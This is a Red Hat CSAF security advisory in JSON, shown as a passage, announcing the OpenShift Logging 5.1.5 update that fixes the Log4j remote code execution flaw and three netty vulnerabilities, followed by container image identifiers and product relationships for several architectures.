{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for OpenShift Logging 5.1.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Openshift Logging Security and Bug Fix Release (5.1.5)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* netty: Request smuggling via content-length header (CVE-2021-21409)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5128", "url": "https://access.redhat.com/errata/RHSA-2021:5128" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "LOG-1971", "url": "https://issues.redhat.com/browse/LOG-1971" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5128.json" } ], "title": "Red Hat Security Advisory: Openshift Logging security and bug update (5.1.5)", "tracking": { "current_release_date": "2024-12-12T01:17:02+00:00", "generator": { "date": "2024-12-12T01:17:02+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5128", "initial_release_date": "2021-12-14T18:09:12+00:00", "revision_history": [ { "date": 
"2021-12-14T18:09:12+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T18:09:12+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:02+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "OpenShift Logging 5.1", "product": { "name": "OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5.1::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.1.5-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.1.5-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-68" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-67" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "product_id": 
"openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-65" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "product_id": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-72" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "product_id": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-75" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "product": { "name": 
"openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.1.5-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.1.5-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-68" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-67" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "product_id": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-65" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "product_id": 
"openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-72" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "product_id": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-75" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.1.5-3" } } }, { "category": "product_version", "name": 
"openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "product": { "name": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "product_id": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-operator-bundle\u0026tag=v5.1.5-9" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.1.5-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "product": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.1.5-10" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-68" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-67" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "product_id": 
"openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-65" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "product_id": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-72" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64", "product_id": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-75" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": 
"openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64" }, "product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64 as a 
component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64" }, "product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64 as a component of OpenShift Logging 5.1", "product_id": 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le" }, 
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.1" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64 as a component of OpenShift Logging 5.1", "product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64" }, "product_reference": 